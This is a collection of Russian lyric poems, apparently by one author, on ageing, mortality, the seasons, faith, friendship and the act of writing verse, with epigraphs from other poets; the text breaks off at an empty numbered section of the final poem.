И теперь в тишине звенит
Эта ветка будто от ветра.

Засыпаю.
Чуть слышный звон
Входит в сон колокольчиком синим,
Что в полях звучит в унисон
Золотому сердцу России.


Nota bene


NB


* * *

Специалист
выделывать антраша,
аж голова – кругом!
Загоняю себя в угол,
как в лузу шар –
бильярдист.


* * *

Не пугай меня, жизнь,
Не пугай, не пугай.
Все в положенный срок
Мы уходим за край.
Но пока не настал
Предназначенный срок,
Постоять на краю
Разреши мне чуток.


* * *

Я жив пока ещё и цел.
Идёт урок, крошится мел.
Задачку у доски решаю
И о звонке не помышляю.
В свой час раздастся непременно
И будет вечной перемена.


* * *

А ведь так станет, так случится.
Меня не станет, лишь страница
С моей последнею строкою
У вас застынет под рукою.

Что в ней, последней, отразится?


* * *

А главное осталось между строк.
А главное ни в чём не отразилось.
Неужто зря душа в трудах томилась?
Иль просто-напросто не вышел срок?..

Ответ не найден. Скомкан лист в комок.




Побеждают всё-таки стихи




* * *

Нет времени совсем
……………………..писать стихи,
Нет времени за стол усесться сгорбясь,
Чтоб ощутить волнение и гордость
В час очищенья слов от шелухи.

Нет времени совсем
……………………..писать стихи,
Нет времени искать душе отдушин,-
Подёнщиной житейскою загружен
За все, должно быть, прошлые грехи.

Нет времени совсем
……………………..писать стихи,
Нет времени в себя взглянуть,
………………………………как в пропасть,
И выстроить, презрев боязнь и робость,
Спасительную лесенку строки.

Нет времени совсем
……………………..писать стихи.
Нет времени…
………………..Из-за его нехватки
Я каждый день
……………….схожусь с судьбою в схватке,
И побеждают всё-таки стихи!


Строфы-IV


*

Жизнь и жалует нас, и жалит.
Только жала её не страшись:
Лишь пчела, потерявшая жало,
Вместе с жалом теряет жизнь.


* *

Краткость жизни – факт досадный.
Но кручиниться не надо:
Ни печаль, ни плачь надсадный
Жизнь не могут нам продлить.
Радость помогает жить!


* * *

Славить пришли, а не хаять,
Хотя этот мир на крови.
Каждый несёт в себе память
Зачатия от любви.


Нехитрая наука

* * *

Нехитрая, кажется, вовсе наука:
О грусти – ни слова,
О боли – ни звука.
О счастье и радости – дни напролёт –
Труби сладострастно,
Ну кто не даёт?

Бывает – затянешь, невзгоды похерив,
И слушают вроде, да только не верят.


Бисер




* * *

Мы все в этой жизни странники,
не помнящие, откуда идём
и не ведающие – куда,
знающие только дорогу,
о которую сбиваем
в кровь
ноги.


* * *

Камни
молчат потому,
что им важно
услышать.

Реки
шумят потому,
что им страшно
услышать.

Люди
ищут компромисс –
строят плотины.


* * *

Будто кто на ромашке гадал –
сорванными лепестками
паруса яхт белеют в бухте.

Интересно,
что пришлось на последний:
«любит» или «не любит»?


* * *

Судя
по хрустящим
под ногой ракушкам,
когда-то здесь было море.
Теперь – степь.
А я представил, что море:
бросил плоский голыш – скачет!


* * *

Горстью песка
пересыпает нас
с ладони на ладонь
Всевышний.

Каждому суждено
просочиться песчинкой
сквозь его тонкие пальцы.


Стихи-видения


В который раз вот так приходят –
Во сне напевны и легки –
Неповторимостью мелодий
Стучатся в сонные виски.

Запомнил вроде, многократно
В уме все строчки повторив,
А просыпаешься – куда-то
Уходят мысли и мотив…


Что ж так мается душа?..


* * *

Жизнь прекрасна. Отчего же
Ты унять не можешь дрожи?
Что, скажи, тебя страшит?
Светом новый день прошит.
Небосвод лазурный чист.
Чист и звонок птичий свист.
Мир наполнен чудным светом,
Повода для страха нету.

Жизнь и вправду хороша,
Что ж так мается душа?..


Сегодня праздник – новый день…



* * *

Сегодня праздник – новый день.
Казалось бы, совсем обычный,
А приглядеться, даже тень –
И та ложится непривычно.

Не так листочки шелестят,
Совсем не так свистит синица…
И начат он, что говорят,
Как жизни новая страница.


* * *

Жизнь – за радость – благодарно
Воспеваю рифмой парной.
Незатейлив лёгкий слог,
Словно птичий голосок.

Возмутится строгий критик,
Перья станет очинять…
Зря! По-своему чирикать
Бог не станет запрещать.


Возраст мой – ещё не возраст…



* * *

Возраст мой – ещё не возраст.
Это, в сущности, пустяк.
Не страдаю от невроза,
Не терзает боль в костях.
Разве что – не сплю ночами…

…До утра пускаю дым,
Ощущая за плечами,
Что не снилось молодым.


Судьба



СУДЬБА

Светлой памяти
Игоря Царёва и Игоря Доминича



Не страданьем – обещаньем
И надеждою была,
Хоть всё чаще, в назиданье,
По-над пропастью вела.

По-над пропастью – по полю,
С васильками в спелой ржи.
И звалась – былинно – долей,
И была – длиною в жизнь.


Растут могилы за спиной…


* * *

Растут могилы за спиной.
Печали душу омрачают.
Друзья уходят в мир иной,
И на звонки не отвечают.

Их телефонов номера
Надёжно в памяти хранятся,
Как будто бы придёт пора,
И снова сможем пообщаться.


Надежду в веру обратив



* * *

Dum spiro, spero*, – вот девиз,
Что не даёт нам падать вниз.
Вернее, это изреченье
Не позволяет по теченью
Плыть, руки на груди скрестив.
Надежду в веру обратив,
Мы до последнего дыханья
Ведём с судьбою состязанье.

_______________________________
* лат. – Пока дышу, надеюсь (из Овидия).


Песня, не прервись на полуслове…


* * *

Песня!
Не прервись на полуслове.
Ты одна – спасенье для меня.
Звёзды загорелись в изголовье,
Словно брызги синего огня.

В ночь окно широкое открою –
Пусть себе черёмуха сорит!
Знать хочу, о чём звезда с звездою
Этой чудной ночью говорит.


Встанешь на ранней заре…



* * *

Встанешь на ранней заре, –
Воздух прохладен и чист.
Птицы поют во дворе,
Льётся серебряный свист.

Льётся волна за волной,
Словно пульсирует свет.
Словно дрожащей струной
Мир ненароком задет.

То ли роса, то ли мёд –
Каплет с ветвей на гранит…
Радостно птаха поёт.
Сладко так сердце щемит.


На сломе жизнь не кончается


* * *

Жизнь без конца ломается…

              Василь Дробот


Отчего без конца ломается
Жизнь, суля нам беду и сомнение?
Вроде правильно жить стараешься, –
Не выходит никак, к сожалению.
Ну, хоть тресни, не получается.
Словно лбом бьёшься в стенку бетонную…
К счастью, нам не дано отчаяться:
Что на сломе жизнь не кончается
Верим всё ж таки непреклонно.


Так и не знаем




* * *

Приходим сюда.
Зачем – мы не знаем.
Планы какие-то всё составляем,
Ставим задачи, диктуем условия…
А жизнь поступает с нами по-своему.
Вносит такие порой коррективы,
Что планы любые – бесперспективны.

В срок ли, досрочно с земли исчезаем,
Зачем приходили – так и не знаем.



Пыльца в лицо тебе летит...



* * *

Пыльца в лицо тебе летит,
До слёз волнует цвет и запах,
И, раззадорен певчей птахой,
Пытаешься слова найти,
Что отразят твоё волненье,
Очарованье и восторг,
Сольются в ленты звонких строк,
Подхватят птиц рассветных пенье.


Когда беда бросает за борт




* * *

Так больно, Господи,
Так больно…
Довольно, Господи,
Довольно!..

Молю,
Кляня в сердцах юдоль,
В отчаяньи забыв невольно:
Снимают только болью
Боль.


* * *

Дела и помыслы чисты,
Так отчего страданья длятся?
Вновь на тетрадные листы,
Как кровь на снег, слова сочатся.

Твой стол – уже не стол – редут.
Всю ночь ты держишь оборону…
Окурки – горкою к утру –
Как гильзы стреляных патронов.


* * *

Они спасительны – стихи,
Когда беда бросает за борт.
Когда б ни лесенка строки,
Давно
..........на дне
.................... кормил бы
.......................................крабов.

Они спасительны – стихи.


Вечный старатель

ВЕЧНЫЙ СТАРАТЕЛЬ

Человек – вечный старатель.
Он всю жизнь
пробирается по сугробам неудач
и ломкому льду потерь.
Отогревает натруженные,
до бесчувствия замёрзшие руки
у костра радости, вспыхнувшего
от уцелевшей спички надежды.
Зачастую отправляется в путь,
влекомый одной только целью,
которая когда-то взошла
хрупкой звёздочкой
над его горизонтом
и лишила покоя.
Вот только нарты души его
не облегчаются, а становятся
день ото дня тяжелее.
Но он тащит их, выбиваясь из сил,
тащит, упорно продвигаясь
к заветной россыпи,
тащит и не догадывается,
насколько богат…


Наложила печать немота…



1.

Как отрезало, р-раз – и ни звука.
Наложила печать немота.
Глухота стала нормой для слуха,
Стала нормой для глаз – слепота.

2.

Не строятся слова в стихи.
Ну что ж, не строятся – и ладно.
Зато не будет чепухи,
Скреплённой рифмой неприглядной.

3.

Духовный кризис. Не пишу.
Пью горький кофе, дым глотаю…
Свет до рассвета не гашу –
Других читаю.


Как - не знаю - тебя мне назвать...

* * *

         Л.С.  


Другого не было пути...
И я прощу, и ты прости.

................. К. Случевский



Как - не знаю - тебя мне назвать.
Ты была со мной редко и мало.
Но ты душу мою понимала,
Как никто не умел понимать.

Чем за это с тобой расплачусь?
Если что у меня и осталось -
Мои строки - экая малость! -
След растраченных некогда чувств.

На прощание я их шепчу.
Нет, не в счёт своего тебе долга.
Просто эта разлука - надолго.
Расставаться с тобой не хочу!


Чудеса - они кругом...

Чудеса - они кругом,
Далеко ходить не надо.
Чтобы убедиться в том,
Хватит пристального взгляда.

Вон - усевшись на цветок,
Шмель - мохнатый сгусток гуда -
Цедит медленно медок -
Чем, скажите мне, не чудо.


Одеялом лоскутным – от штопки – душа...

* * *

Одеялом лоскутным – от штопки – душа,
Вся в нелепых заплатах.
Неуютный, постылый костяк шалаша –
За наивность расплата.

Прогорел костерок, опустел котелок –
Что, казалось бы, хуже?
Но, глотая досады едкий дымок,
Верю: выдержу, сдюжу.


Из пике


* * *

Не первый день, как говорится,
Копчу под этим небом я.
Казалось бы, был очевидцем
Такого, что и не приснится,
Но всё же нечем похвалиться:
Проходит жизнь, а прояснится
Не может смысл бытия.


* * *

А было так много восторгов,
Казалось, что хватит навек.
И мог умилить и растрогать
Закат, полнолуние, снег…

А было завещано сколько!
Но я усмехаюсь опять
С такой прозорливостью горькой,
Которой бы лучше не знать.


* * *

Маятника мерное качанье.
Полночь, одиночество, молчанье.

    Георгий Иванов



Грустные мысли, грустные мысли…
Тучи сплошные будто нависли.
Худо душе, а вокруг – ни души,
Слышно лишь – ходики ходят в тиши.
Маятник влево, маятник вправо…
Сколько же можно маяться, право?


* * *

Показалось – всё устроилось,
И сердечко успокоилось,
Бытие уже не в тягость,
На душе – покой и благость…
Показалось! Через день
Всё – как прежде – набекрень.


* * *

Лишь стоит чуть нажать,
Легонько подтолкнуть, –
И жизнь пойдёт опять,
И не прервётся путь.

И ближе станет даль,
И ярче будет свет.
Кромешная печаль,
Глядишь, сойдёт на нет.

Казалось бы – пустяк,
А всё нейдёт никак…


* * *

Не выручают даже строки –
Увы и ах…
Все лики – сплошь печальнооки –
На образах.
И вновь, прокуренные пальцы
Сложив в щепоть,
Взываешь голосом страдальца:
– Спаси, Господь!


* * *

Когда внезапно сердце защемит
И вдруг тебе захочется покоя,
Уйди от глупых мелочных обид
В простор лугов над тихою рекою.

Постой, сливаясь с этой тишиной,
Под синевой, такою беспредельной, –
И грозы пронесутся стороной,
Угрозы не неся уже смертельной.


* * *

Выхожу из пике.
Хоть не внове, а трудно.
Как следы на песке,
Смыты смутные будни.

Впереди – горизонт –
Неогляден и светел.
Счастлив – как Робинзон,
Тем, что парус заметил.


У самой последней черты



* * *

У самой последней черты,
В преддверии вечной разлуки
Поймёшь и поверишь, что ты
Рождён был не только на муки.

Как книгу, прошедшую жизнь
Листая в обратном порядке,
Меж ломких страниц различишь
Заложенную закладкой.

А может – лишь след от ногтя
Иль галочку тонким графитом –
Радостный миг бытия,
За суетою забытый…

У самой последней черты,
Прощаясь навек, в одночасье
Поймёшь и поверишь, что ты
Вкусил на земле этой счастье.


Циклон




ЦИКЛОН


Циклон всё ширился и рос.
Пространства мощь гудела.
И ветер, налегая, нёс
Его тугое тело.

Он был напористым весьма,
Всё принуждал к смещенью.
Врывался в души и дома,
Как бунт и очищенье.

Он вихри по проспектам гнал,
А в вихрях – хлам и мусор,
И площадной базарный гам,
И веянья, и вкусы.

Он бился яростью сквозной
О стены и навесы.
И пахло в городе весной.
Весной. Листвой. И – лесом.


Распутица чувств



* * *

Жду тебя. Зову тебя.
Ау! Ау! – кричу. –
Весенняя распутица
По-детски светлых чувств!

В каких, скажи, пожалуйста,
Ты пропадаешь днях
И почему безжалостно
Забыла про меня?

Весенняя распутица
Наивных светлых чувств…
В себе совсем запутался,
Распутаться хочу!

* * *

Я и вправду, наверно, спятил!
От весны, от любви, от тебя…
Я бросаюсь в твои объятья,
Проклиная себя,
И прощая себя.

Знаю всё и всё понимаю.
Говорю, что нельзя так, нельзя…
Но – как нельзя, я тебя обнимаю
И целую тебя – как нельзя!


Наступила оттепель в душе…



* * *

Слава Богу, перезимовали.
Наступила оттепель в душе.
Сковывавший сердце, лёд печали
Надломился, тронулся уже.

Посветлели, прояснились дали.
Несказанный дарит небо свет.
Слава Богу, перезимовали.
Слава Богу, выбрались из бед.


Две трети пройдено...

* * *

Две трети пройдено, лишь треть,
Всего лишь треть пути осталась.
Усталость так напластовалась
За эти годы – не стереть.

Легла морщинами у глаз,
Широкий лоб избороздила.
К тому же холодом могила
В лицо дышала мне не раз.

В глазах – отчаянье и грусть.
В висках – надежд сгоревших пепел.
Не побороть душевный трепет,
Да и, признаться, не берусь…

Две трети пройдено, лишь треть,
Всего лишь треть пути осталась.
Клюкой колотит в двери старость,
Маячит у калитки смерть.


Не принимай всерьёз ненастье



* * *

Поверь же в то, что потеряв исток,
Река печали пересохнет вскоре,
Что до последней капельки в песок
Уйдёт её немыслимая горечь, –
И новый день, чтоб ни сулил прогноз,
Наполнен будет неизбывным счастьем.
А потому – не принимай всерьёз
Внезапно наступившее ненастье.


Есть время

* * *

…И всё же,
……………на долгом и трудном пути
Есть время
…………...дыхание перевести.
Есть время
…………...любимой признаться в любви,
Есть время
…………...признать упущенья свои.
Есть время
…………...врагов отличить от друзей.
Есть время
…………...из рук покормить голубей.
Есть время
…………...проверить слова и дела.
Есть время,
…………...на миг отпустив удила,
Забыв
……..о своём автономном полёте,
Спросить у сограждан:
………………………...– Как вы живёте?


Между правдою и ложью...

* * *

Между правдою и ложью
Мы бредём по бездорожью.
Между радостью и грустью –
От истока жизни к устью.
И не знаем, нам ли впору
На крутую жизни гору
Измождёнными руками
Выволочь Сизифов камень.


Под зимнюю мессу в лесу



* * *

Нет, зима не только проза,
Хоть природа и во сне.
Продыши глазок в окне,
Глянь: на зябнущих берёзах
Обживает птичьи гнёзда
Снег!


* * *

Под зимнюю мессу в лесу
Деревья, как храмы, застыли.
И лесу, признаться, к лицу,
Что ели в готическом стиле.


* * *

Стынет в синеве пастельной
Солнца крошечный кружок.
Молодой колючий ельник
Сыплет иглы на снежок.

На нехоженой дорожке
Птичьи – крестиком – следы.
Обок сгрудились берёзки,
Облаком застыв седым.

Словно в сказочное царство,
Входишь в загородный лес.
И пускай здесь нет богатства,
Но зато – полно чудес!


Песням тоже приходит конец…


* * *

Песням тоже приходит конец.
Не навек, видно, голос даётся.
Соловью, на что уж певец,
И тому не всё время поётся.

Только знать не положено срок,
Горечь эта подступит внезапно.
Даже несколько простеньких строк
Черновик не подарит назавтра.

Потускнеют, поблекнут слова,
Многозвучье и вес потеряют.
Громко кычет в ночи сова,
Но не радует крик, а пугает.

Потому, пока не осип,
Не иссякло пока вдохновенье,
Не жалей, поэт, своих сил,
Продолжай, певец, своё пенье!


Строфы-III




*

Пора понять, познавши драму
Сегодняшних сумбурных дней:
Не так важна дорога к Храму,
Как тот, кто движется по ней.


* *

У каждого с рождения свой крест –
Отмерил Бог и путь, и ношу.
Кому-то чин и кресло – Эверест,
Кому-то океан – с калошу.


* * *

Не стройною колонною – вразброд –
Любой идёт по собственной дороге.
У каждого и топь своя, и брод,
И камень свой – споткнулся чтоб – под ноги.


Немного было прояснилось…



* * *

Немного было прояснилось,
И снова туч наволокло.
И с чёрной нитью туго свилось
Отбеленное волокно.

Так туго, что не разобраться.
Тут тереби не тереби –
Лишь до крови изрежешь пальцы
Суровой ниткою судьбы.


Строфы-VII

*

Терзает, а что – непонятно.
Будит средь ночи: «Пиши!»
Поэзия – белые пятна
Непостижимой души.


* *

Мы с виду не разнимся с вами,
Хоть всяк – особый род стихий.
Одними пользуясь словами,
Слагаем разные стихи.


* * *

Не поправить ни единой строчки,
Как бы ни старался, не хитрил.
Прошлое на тайную цепочку
Двери запирает изнутри.


На этом свете несусветном




* * *

На этом свете несусветном,
Где жизнь идёт и так и сяк,
Все верят в счастье беззаветно,
Хотя и мучается всяк.

Все верят в лучшее, но всё же,
И укрепи, и дай нам сил,
Всемилостивый мудрый Боже,
Чтоб крест свой до конца несли.


Не берусь ни гадать, ни пророчить…

* * *

Не берусь ни гадать, ни пророчить
Сколько вёсен ещё впереди.
Знаю – осень свою не отсрочить,
Срок зиме подойдёт – остудить.

К сожалению, век наш не вечен.
Тем дороже и радостней тем
Каждый день, что судьбою намечен
До ухода в кромешную темь.





Строфы-II



*

Душа спасти себя не может,
Защитный снят с неё покров:
Вся – как младенческая кожа,
Чуть тронь – и проступает кровь.


* *

Нет во мне обид, они забыты.
Всем моим обидчикам назло,
В память не вмещаются обиды –
В памяти покойно и светло.


* * *

Что отпущены краткие сроки
В жизни нам – ты о том не тужи.
Улыбнись у предельной межи:
Мы уйдём, но останутся строки, –
Им-то нас суждено пережить.


У камелька



У КАМЕЛЬКА

Кочерёжкой шевеля полешко –
Чтобы разгорелось поскорей,
Говорю себе: – И ты не мешкай,
Полыхай, дружище, веселей.
Стыдно быть чадящей головешкой
В окруженье рдеющих углей.

Сердце не сковала чтоб остуда,
Раньше срока мрак не наступил,
Полыхай вовсю, во имя чуда
Не жалей, не прячь душевный пыл.
Торопись дотла сгореть, покуда
Чёрт трубу заслонкой не закрыл.


В меня слова бросали, словно камни…

* * *


Так много камней брошено в меня,
Что ни один из них уже не страшен…


        Анна Ахматова




В меня слова бросали, словно камни,
Стараясь сбить, как птицу, на лету,
Но помогали всякий раз друзья мне
В полёте не утратить высоту.

Я благодарен им. Спасибо, братцы,
Теперь нисколько не боюсь упасть.
Взлетаю выше, чтобы в точку сжаться,
Чтоб снизу не могли в меня попасть.


Постмодернисты

ПОСТМОДЕРНИСТЫ

В стихи уходим от стихий.
Окопы роем между строчек.
Строчим без запятых и точек,
В запале слепы и глухи.

Захвачен нами Интернет,
Газеты, «толстые» журналы.
Того глядишь, войдём в анналы,
Как говорят, на красный свет.

Широк и шумен наш парад.
Неистребимы нигилисты!
Вокруг, как стреляные гильзы,
Лишь мысли мёртвые лежат…


Строфы

*

Мимолётно вдохновение,
А, гляди, живёт века
Слово, брошенное семенем
В чёрный пласт черновика.

* *

Это только в сказках есть подсказка –
Камень с надписью, куда идти.
В гуще жизни, как в трясине вязкой,
Чаще гинем, не сыскав пути.

* * *

Всё туже памяти кольцо,
Но, если пристально вглядеться,
Не сыщешь ссадин и рубцов –
Лишь след от радости на сердце.


Чист мой лист…



* * *

Чист мой лист, как первый снег,
Выпавший в ночи нежданно.
Чист мой лист, и, как ни странно,
Нет желания во мне
Пробежать по целине –
Потревожить строчкой ранней.

Снег следами, лист строкою
Не решаюсь беспокоить…


Мороза хочется, снежка…

* * *

Мороза хочется, снежка.
Чтоб паром щекотало ноздри.
Чтоб хрупкие ложились звёзды
На жёсткий ворс воротника.

Мороза хочется, снежка.
Пушка искристого на ветках.
Эпитетов, сравнений метких
И зимней свежести – в стихах.


Всё не так уж и плохо…


* * *

Что ты плачешь, современник,
что ты жалуешься, друг…

    Бахыт Кенжеев


Чего голосить, всё не так уж и плохо.
Тебя не коснулась шальная эпоха.
А если задела, то только слегка,
Не ветра порывом – струёй сквозняка.
Ты преувеличил опасность, похоже.
Они от озноба – мурашки на коже.


Вот-вот декабрь…



НОЯБРЬ, 30

Вот-вот декабрь. Тридцатое число.
Зима, должно быть, где-то на подходе.
Ещё её холодное крыло
Не изменило ничего в природе.

Всё та же дымка серая висит
Под выцветшей небесной синевою,
Всё так же одиноко лист дрожит,
Пригнутый стылой каплей дождевою.

Всё так же важно ходят по земле
Большие белоносые вороны…
И только на берёзовом стволе
Немного больше стало меток чёрных.


Межсезонье


МЕЖСЕЗОНЬЕ

Не зима ещё, уже не осень.
Небо ясно, но дождит слегка:
Ветер брызги редкие доносит,
Что вдали роняют облака.

Холодом продута и размыта
Межсезонья зыбкая межа.
Первая снежинка деловито
На ладонь спускается, кружа…


Чтоб подольше здесь остаться

* * *

Мир – твоя колея, а моя,
как ты видишь, – тупик.

    Инна Лиснянская


Не жду уже
Вестей или подарков.
На сей меже –
Лишь скопище огарков…

Здесь пыль и прах,
Сетей паучьих гарус.
Смертельный страх
С отчаяньем на пару.

* * *

Не жажду счастья, не бегу
Вслед за мечтою легкокрылой.
Топчусь на том же берегу,
Буравлю взглядом вид унылый.

Обрыдло всё. Давным-давно
В глазах навязло и приелось.
Но – не кончается кино,
И ничего нельзя поделать…

* * *

А чтоб подольше здесь остаться,
За что-то надобно держаться.
За что-то надо уцепиться,
Чтоб ненароком не свалиться
В ту пропасть, на краю которой
Смиряем гонор свой и норов.

* * *

Что остаётся? Наслаждаться
Всем тем, с чем больно расставаться.
Всем тем, что радует сейчас,
Прекрасно в профиль и анфас.
Всем, окружающим тебя
В преддверье вьюг и декабря.
И капля, и листочек влажный –
Всё это трепетно и важно.

* * *

Создаю свой мир, в котором
Радостен и шум, и шорох.
Мир, что мне на склоне лет
Дарит запахи и цвет.
Мир, в котором и в ненастье
Ощутима сладость счастья.


Ноябрь нынче стыл и мрачен...

* * *

Ноябрь нынче стыл и мрачен.
И так же мрачно на душе…
В карманы глубже руки пряча,
Уткнувши бороду в кашне,
Бреду над стынущей рекою,
Сырую опаль вороша, –
И наполняется покоем
Всплакнуть готовая душа.


Вдруг почувствовал: что-то случилось...

* * *

Вдруг почувствовал: что-то случилось.
А вот что – всё никак не пойму.
Что-то в душу мою просочилось,
Неподвластное даже уму.

Просочилось. Пугает. Тревожит.
Рвёт надежды хрупкую нить.
И прошу я Спасителя: «Боже!
Всех любимых мной сохрани».


Что упало – то пропало...

* * *

Что упало – то пропало.
Прошлого не вороши.
Не казнись, что разменяло
Время годы на гроши.

Не пытай скупую память.
Если что и есть в казне, –
Не растраченные нами
Звонких несколько монет…


Доброе ремесло



* * *

Для негромких дел
особый счёт…

Олег Бондарь


Не познан…
Не признан…
Незнаем…
А надо ли? Думаю, нет.
В себя этот мир принимая,
Любовь возвращает поэт.
Свет возвращает построчно,
Каждой буквой – тепло…
Поэзия – знаю точно –
Доброе ремесло.


Ночное



NOTTURNO*

*

Ноябрь. Ночь.
Ни зги не видно.
Ненастьем съедена луна.
Моей печали Атлантида
Всплывает медленно со дна…

* *

Как долги стали ночи, как глухи,
Как медленно текут они к рассвету…
И ранят, и гнетут меня стихи,
Но ни судьбы без них, ни жизни – нету.

Спасали от беды они не раз
И сотни раз – от разных потрясений.
Вот и сегодня, в этот смутный час,
Лишь в них одних ищу душе спасенье.


_____________
* Ночное (ит.)


Мокрый вальс играет осень

* * *

Изнываю от тоски.
Грусти плотные мазки
Жизнь на холст души наносит.
Неуютно и несносно…
Дождь холодный жжёт виски –
На пригорке у реки
В стылой роще безголосой
Мокрый вальс играет осень.


Горький день запил сладким чаем...

* * *

Горький день запил
Сладким чаем.
Думал: всё забыл.
Полегчало.
А наутро вдруг –
Как иголкой
Сердце кто кольнул –
Кофе горький...


Врачую душу красотой



* * *

Выбрал я из листьев палых
Лист кленовый пятипалый.
Поднял трепетной рукой
Распрекрасный лист такой.
Сказочный его окрас –
Наслаждение для глаз.
Душу красотой врачуя,
В пальцах чудный лист верчу я.


Подпитка для души



* * *

Часы отдохновения –
Подпитка для души –
Под листьев шелестение
Прогулочка в глуши.

Вдали от гуда города,
От дрязг его и драм.
В пределах леса голого,
Что гулок точно храм.

Хожу по светлым просекам,
От пряной прели пьян.
Мне служит верным посохом
Четырёхстопный ямб.


На последнем пороге


* * *

           Жить - это значит муки длить,
           Чтоб получить в мтоге фигу...
                                 Лариса Миллер

У светлых истоков,
В самом начале,
Нам горы всего,
Не скупясь, обещали.

Радость и счастье
Щедро сулили.
Коврижками с мёдом
Усердно манили.

Поддались.
Поверили.
Были наивны.
Влезли в ярмо,
Далеко не двужильны.

Кряхтели.
Терпели.
Надежду питали:
Сбудется.
Будет всё,
Как обещали…

Кой-как добрели.
На последнем пороге
Что же имеем,
Скажите,
В итоге?

Фигушку с маком.
Попросту – дулю.
Не обманули нас –
Подло надули.


Осень ещё красотой своей радует…



* * *

Осень ещё красотой своей радует,
Последним теплом на прощанье дарит,
Но по утрам так горестно падают
Мокрые листья с продрогших ракит.

Вслед за печальной гусей вереницей
Из опустевших гнездовий грачей
Ветер взлетает взъерошенной птицей,
Зябкие капли сбивая с ветвей.


На излёте лет



* * *

Для чего-то нужен,
Коль суровый Бог
От смертельной стужи
Уберёг.

Для чего-то нужен,
Если Бог меня
Уберёг к тому же
От огня.

Нужен… Для чего же?
На излёте лет
Умоляю: – Боже!
Дай ответ.


Миниатюра



* * *

Мокрым утёнком
прошлёпала осень по парку.
Под каждым клёном –
следы перепончатых лапок.


Тянет стужей уже от земли...

* * *

Тянет стужей уже от земли.
Чахнут травы под инеем колким.
Под неспешным шагом моим
Рассыпаются лета осколки.

Лес, наполненный духом грибным,
Хной и охрой измазанный густо,
Этим утром октябрьским сырым
Нынче выглядит особенно грустно.


Своею слабостью сильны…


* * *

Своею слабостью сильны…
Ты уж, Господь, прости, –
Соскальзывает со спины
Крест, что дано нести.

Никто не подсобит плечом.
Во гневе ли, в мольбе,
Всяк движется своим путём –
К Тебе.


Кружатся листья и падают в травы…


* * *

Кружатся листья и падают в травы,
Густо покрытые бурою хною.
Над просветлённой притихшей рекою
Шепчутся с ветром о чём-то дубравы.

Крупной росою ложится прохлада
Прямо на жаркие грозди рябины.
К югу далёкому клин журавлиный,
Как парус, плывёт на волнах листопада.

Вяжет туманы на розовых спицах
Поздний рассвет над немыми лугами.
Дальняя роща манит грибами,
В гулкой глуши зовёт заблудиться.


Водочки стопарик хапну я…


* * *

Водочки стопарик хапну я,
Сигареткой затянусь,
На свою житуху «сладкую»,
Непутёвый, оглянусь:

Что там было, чего не было,
Получил ли, что желал…
Похвалился бы победами, –
Отродясь не побеждал.

В море быта, словно лодочка,
Трещину любовь дала.
Уплыла моя лебёдушка,
Вот такие, брат, дела...

А ещё – утрата горькая
Ряд пополнила могил.
В бесконечные попойки я
От печали уходил.

Прокурив чужие комнаты,
Где случайным гостем был,
Слишком поздно я опомнился,
Что полжизни загубил.

Минул год со всеми бедами.
Так, глядишь, и жизнь пройдёт…
Впрочем, о конце не ведая,
Каждый всё же счастье ждёт.


К островам совершенного счастья


* * *

К островам совершенного счастья
Не судьба нам с тобой догрести.
Наши лодки терзает ненастье,
Наши души у Бога в горсти.

В стылом море наставшего века,
Занесённом сплошь льдом и шугой,
Невозможно спастись человеку
С обнажённой и чуткой душой.

Но мы знаем: старанья не лишни.
Нам не тяжек наш горестный крест.
Просвети, милосердный Всевышний,
Чтоб из гибельных выбраться мест.

Не оставь без любви и участья,
Дай закончить земные труды, –
К островам совершенного счастья
Будет легче пробиться другим.


Пламя сердца тушуют дожди…



* * *

Пламя сердца тушуют дожди,
На душе разыгралось ненастье.
Как невзгоды, скажи, пережить?
Как добраться до счастья?

Я так долго в пути. Видит Бог,
Испытал и любовь и пристрастье.
Но не выпало всё же дорог,
Чтобы вывели к счастью.

Мог бы многое в жизни отдать,
До крупицы последней и части,
Чтоб хоть глазом одним увидать
Пресловутое счастье.


Мы тоже осенними стали…



Всё дольше дожди моросят,
Всё дальше отлётные стаи…
Мы тоже осенними стали
Под натиском бед и утрат.

Нас тоже задел холодок,
Как эти деревья и травы.
Врачуя душевные травмы,
Грызём валидола ледок.

Бредём бездорожьем невзгод,
Шагами бессонницу мерим,
Но, как бы там ни было, верим,
Что лучшее время придёт.


Искус



* * *

Не браните за строки, звучащие грустно, –
Вся поэзия русская грусти полна.
Вроде горькой микстуры, жизнь наша искусно
Во флакончик изящный заключена.

Глянешь через стекляшку – всё в розовом цвете,
Пригубишь – исказится гримасой лицо.
Для доверчивых нас ухищрения эти
Не случайно, должно быть, создавались Творцом.

Стал желанным для многих сей странный напиток,
Показавшись сперва даже сладким на вкус.
До сих пор, как и пращуры-троглодиты,
Мы не можем пройти этот древний искус.


Днесь


ДНЕСЬ

Как бы ни тщились мы,
нам не присуще
будущим жить,
лишь – мгновеньем текущим.
Только сегодня –
сейчас, в этот миг –
ты ощущаешь,
сколь мал и велик.


Счастье – что? Иллюзия, не боле…



* * *

Счастье – что? Иллюзия, не боле.
В жизни счастья не было и нет.
Лишь страданий в ней – с лихвой и боли
От напастей да различных бед.

Стиснув зубы и собрав всю волю,
Силимся закон её понять,
Чтоб, вконец измучившись, с любовью
Все невзгоды счастьем вдруг назвать.


По праву очевидца


* * *

Может быть, пройду ещё немного.
Может, шаг всего – и упаду.
Не молю я милости у Бога,
Не прошу предупредить беду.

Что должно случиться – пусть случится!
Не страшусь ни стужи, ни огня.
Всё приму по праву очевидца,
Нет другого права у меня.


Голый ангел



* * *

Голубь –
в осенней
сини.

Стынет,
как ангел
голый.


А жизнь прекрасна, чёрт возьми!..


* * *

А жизнь прекрасна, чёрт возьми,
Она действительно прекрасна!
Её, чертовку, любим страстно,
Хоть ближе к смерти каждый миг...

____________


Пейзаж с лодкой


ПЕЙЗАЖ С ЛОДКОЙ

Глубоко вошла в песок, плотно,
Старая лодка,
Дряхлая лодка.

Заплатка на заплатке,
Заноза на занозе…

Море в лихорадке.
Берег – в пене.

Осень.


Другу

ДРУГУ

Ты живой, покуда помнит душа
............О своём крыле!

.......................Инна Лиснянская

1.

Кипит
Страстей девятый вал,
Не утихает спор с судьбою.
Не дрейфь, дружище! Кто сказал,
Что мы состарились с тобою?

Идей и дел невпроворот.
Года – не повод для унынья.
Ничто полёт твой не прервёт,
Покуда будешь верить в крылья.

2.

К чему нам ложные слова,
Ненастоящие восторги,
Когда – седеет голова,
Когда – не в гору путь, а с горки?

Душою искренне прильни
К тому, что истинно прекрасно.
Живём не в радостные дни,
Но, слава Богу, не напрасно.

Хотя судьбы бедоворот
Нас беспощадно каруселит,
Вперёд по-прежнему ведёт
Магнит недостижимой цели.

3.

